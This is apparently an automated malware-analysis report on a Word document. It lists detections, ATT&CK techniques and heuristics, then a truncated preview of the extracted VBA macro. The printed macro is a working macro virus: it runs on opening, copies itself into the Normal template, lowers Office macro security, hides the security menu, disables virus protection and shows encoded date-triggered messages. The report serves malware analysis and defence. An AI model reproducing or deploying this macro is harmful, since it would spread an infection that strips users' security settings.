MALICIOUS
320
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains obfuscated VBA macros designed to execute upon opening the document, as indicated by the 'Document_Open' macro and 'CreateObject' calls. The macro attempts to modify registry keys related to the registered owner and Office security level. The presence of 'Win.Trojan.Psycho-3' and 'Win.Worm.VBS-213' detections strongly suggests malicious intent, likely to download and execute a secondary payload.
Heuristics 6
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10388 bytes |
SHA-256: d842314a0df7346fcecbd392fb9d28b3b358039c7149709b2fb5779f79ba9c40 |
|||
|
Detection
ClamAV:
Win.Worm.VBS-213
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
ActiveDocument.VBProject.VBComponents.Item(1).Name = NormalTemplate.VBProject.VBComponents.Item(1).Name
nt = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
ad = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "--··-«([BencH])»-··--"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
If Application.Version = 9# Then
CommandBars("Macro").Controls("Security...").Visible = False
End If
If Application.Version = 8# Then
Options.ConfirmConversions = False: Options.VirusProtection = False: Application.EnableCancelKey = wdCancelDisabled
CommandBars("Bench").Visible = True
End If
If Day(Now) = 17 And Month(Now) = 11 Then
With Assistant.NewBalloon
.Icon = msoIconAlert
.Heading = Chr(91) + Chr(66) + Chr(101) + Chr(110) + Chr(99) + Chr(104) + Chr(93) + Chr(32) + Chr(77) + Chr(97) + Chr(99) + Chr(114) + Chr(111) + Chr(32) + Chr(86) + Chr(105) + Chr(114) + Chr(117) + Chr(115) + Chr(32) + Chr(40) + Chr(69) + Chr(41)
.Text = Chr(73) + Chr(116) + Chr(39) + Chr(115) + Chr(32) + Chr(109) + Chr(121) + Chr(32) + Chr(97) + Chr(117) + Chr(116) + Chr(104) + Chr(111) + Chr(114) + Chr(39) + Chr(115) + Chr(32) + Chr(98) + Chr(105) + Chr(114) + Chr(116) + Chr(104) + Chr(100) + Chr(97) + Chr(121) + Chr(32) + Chr(116) + Chr(111) + Chr(100) + Chr(97) + Chr(121) + Chr(33) + Chr(33) + Chr(33) + Chr(32) + Chr(76) + Chr(101) + Chr(116) + Chr(39) + Chr(115) + Chr(32) + Chr(97) + Chr(108) + Chr(108) + Chr(32) + Chr(99) + Chr(101) + Chr(108) + Chr(101) + Chr(98) + Chr(114) + Chr(97) + Chr(116) + Chr(101) + Chr(33) + Chr(33) + Chr(33)
.Animation = msoAnimationGetAttentionMajor
.Show
End With
ActiveDocument.Content.Font.Animation = wdAnimationSparkleText
End If
If Day(Now) = Minute(Now) Then
Application.Caption = Chr(40) + Chr(91) + Chr(66) + Chr(93) + Chr(77) + Chr(86) + Chr(41) + Chr(32) + Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(32) + Chr(87) + Chr(111) + Chr(114) + Chr(100)
Application.StatusBar = Chr(89) + Chr(111) + Chr(117) + Chr(32) + Chr(119) + Chr(101) + Chr(114) + Chr(101) + Chr(32) + Chr(105) + Chr(110) + Chr(102) + Chr(101) + Chr(99) + Chr(116) + Chr(101) + Chr(100) + Chr(32) + Chr(119) + Chr(105) + Chr(116) + Chr(104) + Chr(32) + Chr(116) + Chr(104) + Chr(101) + Chr(32) + Chr(91) + Chr(66) + Chr(101) + Chr(110) + Chr(99) + Chr(104) + Chr(93) + Chr(32) + Chr(77) + Chr(97) + Chr(99) + Chr(114) + Chr(111) + Chr(32) + Chr(86) + Chr(105) + Chr(114) + Chr(117) + Chr(115)
ActiveDocument.Content.Font.Animation = wdAnimationShimmer
End If
If Month(Now) = 4 And Day(Now) = 19 Then
Application.StatusBar = Chr(73) + Chr(110) + Chr(102) + Chr(101) + Chr(99) + Chr(116) + Chr(101) + Chr(100) + Chr(32) + Chr(119) + Chr(105) + Chr(116) + Chr(104) + Chr(32) + Chr(91) + Chr(66) + Chr(101) + Chr(110) + Chr(99) + Chr(104) + Chr(93) + Chr(32) + Chr(77) + Chr(97) + Chr(99) + Chr(114) + Chr(111) + Chr(32) + Chr(86) + Chr(105) + Chr(114) + Chr(117) + Chr(115) + Chr(46) + Chr(46) + Chr(46) + Chr(32) + Chr(45) + Chr(32) + Chr(91) + Chr(66) + Chr(101) + Chr(110) + Chr(99) + Chr(104) + Chr(93)
ActiveDocument.Content.Font.Animation = wdAnimationSparkleText
End If
If Month(Now) = 5 And Day(Now) = 1 Then
Application.Caption = Chr(65) + Chr(110) + Chr(110) + Chr(105) + Chr(118) + Chr(101) + Chr(114) + Chr(115) + Chr(97) + Chr(114) + Chr(121)
Application.StatusBar = Chr(68) + Chr(101) + Chr(97) + Chr(114) + Chr(101) + Chr(115) + Chr(116) + Chr(32) + Chr(68) + Chr(105) + Chr(110) + Chr(97) + Chr(104) + Chr(46) + Chr(32) + Chr(89) + Chr(111) + Chr(117) + Chr(32) + Chr(119) + Chr(105
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.